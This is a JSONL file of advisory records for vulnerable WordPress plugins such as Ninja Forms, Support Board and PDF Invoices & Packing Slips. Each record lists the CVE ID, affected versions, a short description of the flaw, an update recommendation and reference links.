{"CVE_ID":"CVE-2024-12878","slug":"lazy-blocks","versionImpact":"3.8.2","versionEndExcluding":"3.8.3","description":"The Custom Block Builder  WordPress plugin before 3.8.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"Update to version 3.8.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/827444d1-87cb-4057-827a-d802eac82cf8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/827444d1-87cb-4057-827a-d802eac82cf8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12031","slug":"advanced-floating-content","versionImpact":"3.8.2","versionEndExcluding":"3.8.3","description":"The Advanced Floating Content plugin for WordPress is vulnerable to SQL Injection via the 'floating_content_duplicate_post' function in all versions up to, and including, 3.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.8.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/advanced-floating-content\\\/9945856\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/advanced-floating-content\\\/9945856\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/927076bc-bafa-43d6-bf3b-5861844c932a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/927076bc-bafa-43d6-bf3b-5861844c932a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5949","slug":"smartcrawl-seo","versionEndExcluding":"3.8.3","description":"The SmartCrawl WordPress plugin before 3.8.3 does not prevent unauthorised users from accessing password-protected posts' content.","recommendation":"Update to version 3.8.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3cec27ca-f470-402d-ae3e-271cb59cf407\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3cec27ca-f470-402d-ae3e-271cb59cf407\",\"refsource\":\"\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]}]"}
{"CVE_ID":"CVE-2024-4710","slug":"ubermenu","versionImpact":"3.8.2","versionEndExcluding":"3.8.3","description":"The UberMenu plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ubermenu-col, ubermenu_mobile_close_button, ubermenu_toggle, ubermenu-search shortcodes in all versions up to, and including, 3.8.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.8.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96161594-9513-49f7-91ab-9ad05b900a81?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96161594-9513-49f7-91ab-9ad05b900a81?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ubermenu-wordpress-mega-menu-plugin\\\/154703\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ubermenu-wordpress-mega-menu-plugin\\\/154703\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2079","slug":"addons-for-visual-composer","versionImpact":"3.8.1","versionEndExcluding":"3.8.3","description":"The WPBakery Page Builder Addons by Livemesh plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'per_line_mobile' shortcode in all versions up to, and including, 3.8.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.8.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c07b5c8-7fae-499d-9f6c-9392166f74b8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c07b5c8-7fae-499d-9f6c-9392166f74b8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3048239%40addons-for-visual-composer&new=3048239%40addons-for-visual-composer&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3048239%40addons-for-visual-composer&new=3048239%40addons-for-visual-composer&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13470","slug":"ninja-forms","versionImpact":"3.8.24","versionEndExcluding":"3.8.25","description":"The Ninja Forms \u2013 The Contact Form Builder That Grows With You plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode in all versions up to, and including, 3.8.24 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.8.25, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-forms\\\/tags\\\/3.8.23\\\/includes\\\/Display\\\/Render.php#L708\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-forms\\\/tags\\\/3.8.23\\\/includes\\\/Display\\\/Render.php#L708\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-forms\\\/tags\\\/3.8.23\\\/includes\\\/Display\\\/Shortcodes.php#L8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-forms\\\/tags\\\/3.8.23\\\/includes\\\/Display\\\/Shortcodes.php#L8\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-forms\\\/tags\\\/3.8.23\\\/ninja-forms.php#L953\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-forms\\\/tags\\\/3.8.23\\\/ninja-forms.php#L953\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3229932%40ninja-forms%2Ftrunk&old=3226451%40ninja-forms%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3229932%40ninja-forms%2Ftrunk&old=3226451%40ninja-forms%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f2b46a9-d228-43b4-84af-d56218076087?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f2b46a9-d228-43b4-84af-d56218076087?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12238","slug":"ninja-forms","versionImpact":"3.8.22","versionEndExcluding":"3.8.23","description":"The The Ninja Forms \u2013 The Contact Form Builder That Grows With You plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 3.8.22. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes.","recommendation":"Update to version 3.8.23, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-forms\\\/tags\\\/3.8.20\\\/includes\\\/Display\\\/Preview.php#L68\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-forms\\\/tags\\\/3.8.20\\\/includes\\\/Display\\\/Preview.php#L68\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/524a2143-b15f-4edc-98de-dafef4c5bc00?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/524a2143-b15f-4edc-98de-dafef4c5bc00?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11052","slug":"ninja-forms","versionImpact":"3.8.19","versionEndExcluding":"3.8.20","description":"The Ninja Forms \u2013 The Contact Form Builder That Grows With You plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the calculations parameter in all versions up to, and including, 3.8.19 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.8.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-forms\\\/tags\\\/3.8.18\\\/includes\\\/Admin\\\/Metaboxes\\\/Calculations.php#L26\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-forms\\\/tags\\\/3.8.18\\\/includes\\\/Admin\\\/Metaboxes\\\/Calculations.php#L26\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3adf367-0126-4d95-b337-cc3581975113?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3adf367-0126-4d95-b337-cc3581975113?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0552","slug":"pie-register","versionEndExcluding":"3.8.2.3","description":"The Registration Forms WordPress plugin before 3.8.2.3 does not properly validate the redirection URL when logging in and login out, leading to an Open Redirect vulnerability","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/832c6155-a413-4641-849c-b98ba55e8551\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/832c6155-a413-4641-849c-b98ba55e8551\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6788","slug":"metform","versionImpact":"3.8.1","versionEndExcluding":"3.8.2","description":"The Metform Elementor Contact Form Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.8.1. This is due to missing or incorrect nonce validation on the contents function. This makes it possible for unauthenticated attackers to update the options \"mf_hubsopt_token\", \"mf_hubsopt_refresh_token\", \"mf_hubsopt_token_type\", and \"mf_hubsopt_expires_in\" via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This would allow an attacker to connect their own Hubspot account to a victim site's metform to obtain leads and contacts.","recommendation":"Update to version 3.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30fd2425-ee48-4777-91c1-03906d63793a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30fd2425-ee48-4777-91c1-03906d63793a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/core\\\/integrations\\\/crm\\\/hubspot\\\/loader.php#L87\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/core\\\/integrations\\\/crm\\\/hubspot\\\/loader.php#L87\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3011284\\\/metform\\\/trunk\\\/core\\\/integrations\\\/crm\\\/hubspot\\\/loader.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3011284\\\/metform\\\/trunk\\\/core\\\/integrations\\\/crm\\\/hubspot\\\/loader.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8757","slug":"wp-post-author","versionImpact":"3.8.1","versionEndExcluding":"3.8.2","description":"The WP Post Author \u2013 Boost Your Blog&#039;s Engagement with Author Box, Social Links, Co-Authors, Guest Authors, Post Rating System, and Custom User Registration Form Builder plugin for WordPress is vulnerable to time-based SQL Injection via the linked_user_id parameter in all versions up to, and including, 3.8.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d667bafc-5f19-4889-a988-236df050c013?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d667bafc-5f19-4889-a988-236df050c013?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/GumGumZz\\\/wordpress\\\/blob\\\/main\\\/wp-post-author.md\",\"name\":\"https:\\\/\\\/github.com\\\/GumGumZz\\\/wordpress\\\/blob\\\/main\\\/wp-post-author.md\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-post-author\\\/trunk\\\/includes\\\/multi-authors\\\/wpa-multi-authors.php#L182\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-post-author\\\/trunk\\\/includes\\\/multi-authors\\\/wpa-multi-authors.php#L182\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3166002\\\/wp-post-author\\\/trunk\\\/includes\\\/multi-authors\\\/wpa-multi-authors.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3166002\\\/wp-post-author\\\/trunk\\\/includes\\\/multi-authors\\\/wpa-multi-authors.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3866","slug":"ninja-forms","versionImpact":"3.8.15","versionEndExcluding":"3.8.16","description":"The Ninja Forms Contact Form plugin for WordPress is vulnerable to Reflected Self-Based Cross-Site Scripting via the 'Referer' header in all versions up to, and including, 3.8.15 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. Successful exploitation of this vulnerability requires \"maintenance mode\" for a targeted form to be enabled. However, there is no setting available to the attacker or even an administrator-level user to enable this mode. The mode is only enabled during a required update, which is a very short window of time. Additionally, because of the self-based nature of this vulnerability, attackers would have to rely on additional techniques to execute a supplied payload in the context of targeted user.","recommendation":"Update to version 3.8.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6d6b82d-574d-4a56-9aef-42343c4b7c43?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6d6b82d-574d-4a56-9aef-42343c4b7c43?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3153292\\\/ninja-forms\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3153292\\\/ninja-forms\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7354","slug":"ninja-forms","versionImpact":"3.8.10","versionEndExcluding":"3.8.11","description":"The Ninja Forms  WordPress plugin before 3.8.11 does not escape an URL before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 3.8.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3c871dcd-51d7-4d3b-b036-efa9e066ff41\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3c871dcd-51d7-4d3b-b036-efa9e066ff41\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3047","slug":"woocommerce-pdf-invoices-packing-slips","versionImpact":"3.8.0","versionEndExcluding":"3.8.1","description":"The PDF Invoices & Packing Slips for WooCommerce plugin for WordPress is vulnerable to Server-Side Request Forgery in versions up to, and including, 3.8.0 via the transform() function. This can allow unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"Update to version 3.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18f16148-b4a8-4f89-af0d-c0baba8f9ccf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18f16148-b4a8-4f89-af0d-c0baba8f9ccf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3076105\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3076105\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3045","slug":"woocommerce-pdf-invoices-packing-slips","versionImpact":"3.8.0","versionEndExcluding":"3.8.1","description":"The PDF Invoices & Packing Slips for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several parameters in versions up to, and including, 3.8.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d0e5d24-5d65-4ed5-8086-347969cbd3ec?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d0e5d24-5d65-4ed5-8086-347969cbd3ec?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-pdf-invoices-packing-slips\\\/trunk\\\/ubl\\\/Transformers\\\/AddressTransformer.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-pdf-invoices-packing-slips\\\/trunk\\\/ubl\\\/Transformers\\\/AddressTransformer.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3076105\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3076105\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3213","slug":"wp-mail-smtp-pro","versionImpact":"3.8.0","versionEndExcluding":"3.8.1","description":"The WP Mail SMTP Pro plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the is_print_page function in versions up to, and including, 3.8.0. This makes it possible for unauthenticated attackers to disclose potentially sensitive email information.","recommendation":"Update to version 3.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a813251b-a4c1-4b23-ad03-dcc1f4f19eb9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a813251b-a4c1-4b23-ad03-dcc1f4f19eb9?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpmailsmtp.com\\\/docs\\\/how-to-view-recent-changes-to-the-wp-mail-smtp-plugin-changelog\\\/\",\"name\":\"https:\\\/\\\/wpmailsmtp.com\\\/docs\\\/how-to-view-recent-changes-to-the-wp-mail-smtp-plugin-changelog\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9384","slug":"wholesale-pricing-woocommerce","versionImpact":"3.8.0","versionEndExcluding":"3.8.1","description":"The Quantity Dynamic Pricing & Bulk Discounts for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.8.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e84ee2b5-96b5-427c-ac66-7f80418ae02f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e84ee2b5-96b5-427c-ac66-7f80418ae02f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wholesale-pricing-woocommerce\\\/tags\\\/3.8.0\\\/includes\\\/settings\\\/class-alg-wc-wholesale-pricing-settings-per-product.php#L126\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wholesale-pricing-woocommerce\\\/tags\\\/3.8.0\\\/includes\\\/settings\\\/class-alg-wc-wholesale-pricing-settings-per-product.php#L126\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161269\\\/wholesale-pricing-woocommerce\\\/tags\\\/3.8.1\\\/includes\\\/settings\\\/class-alg-wc-wholesale-pricing-settings-per-product.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161269\\\/wholesale-pricing-woocommerce\\\/tags\\\/3.8.1\\\/includes\\\/settings\\\/class-alg-wc-wholesale-pricing-settings-per-product.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4855","slug":"supportboard","versionImpact":"3.8.0","versionEndExcluding":"3.8.1","description":"The Support Board plugin for WordPress is vulnerable to unauthorized access\/modification\/deletion of data due to use of hardcoded default secrets in the sb_encryption() function in all versions up to, and including, 3.8.0. This makes it possible for unauthenticated attackers to bypass authorization and execute arbitrary AJAX actions defined in the sb_ajax_execute() function. An attacker can use this vulnerability to exploit CVE-2025-4828 and various other functions unauthenticated.","recommendation":"Update to version 3.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/support-board-help-desk-and-chat\\\/20359943\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/support-board-help-desk-and-chat\\\/20359943\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/afd48bc8-d490-4a3e-97fc-70cf008cbf66?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/afd48bc8-d490-4a3e-97fc-70cf008cbf66?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4828","slug":"supportboard","versionImpact":"3.8.0","versionEndExcluding":"3.8.1","description":"The Support Board plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the sb_file_delete function in all versions up to, and including, 3.8.0. This makes it possible for attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). An attacker can leverage CVE-2025-4855 vulnerability to exploit this vulnerability unauthenticated.","recommendation":"Update to version 3.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/support-board-help-desk-and-chat\\\/20359943\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/support-board-help-desk-and-chat\\\/20359943\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33989611-8640-4c33-a34e-14f10cd7286d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33989611-8640-4c33-a34e-14f10cd7286d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2032","slug":"custom-404-pro","versionEndExcluding":"3.8.1","description":"The Custom 404 Pro WordPress plugin before 3.8.1 does not properly sanitize database inputs, leading to multiple SQL Injection vulnerabilities.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/17acde5d-44ea-4e77-8670-260d22e28ffe\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/17acde5d-44ea-4e77-8670-260d22e28ffe\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6487","slug":"intelly-related-posts","versionImpact":"3.7.0","versionEndExcluding":"3.8.0","description":"The Inline Related Posts WordPress plugin before 3.8.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 3.8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eeec9608-a7b2-4926-bac2-4c81a65dd473\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eeec9608-a7b2-4926-bac2-4c81a65dd473\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0144","slug":"mage-eventpress","versionEndExcluding":"3.8.0","description":"The Event Manager and Tickets Selling Plugin for WooCommerce WordPress plugin before 3.8.0 does not validate and escape some of its post meta before outputting them back in a page\/post, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d7b3917a-d11f-4216-9d2c-30771d83a7b4\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d7b3917a-d11f-4216-9d2c-30771d83a7b4\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0705","slug":"payment-gateway-stripe-and-woocommerce-integration","versionImpact":"3.7.9","versionEndExcluding":"3.8.0","description":"The Stripe Payment Plugin for WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 3.7.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2652a7fc-b610-40f1-8b76-2129f59390ec?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2652a7fc-b610-40f1-8b76-2129f59390ec?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2954934%40payment-gateway-stripe-and-woocommerce-integration&new=2954934%40payment-gateway-stripe-and-woocommerce-integration&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2954934%40payment-gateway-stripe-and-woocommerce-integration&new=2954934%40payment-gateway-stripe-and-woocommerce-integration&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9610","slug":"language-switcher","versionImpact":"3.7.13","versionEndExcluding":"3.8.0","description":"The Language Switcher plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.7.13. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f117fffb-2bbb-4e95-b589-909972db1e5e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f117fffb-2bbb-4e95-b589-909972db1e5e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/language-switcher\\\/tags\\\/3.7.13\\\/includes\\\/class-language-switcher-settings.php#L464\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/language-switcher\\\/tags\\\/3.7.13\\\/includes\\\/class-language-switcher-settings.php#L464\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165172\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165172\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
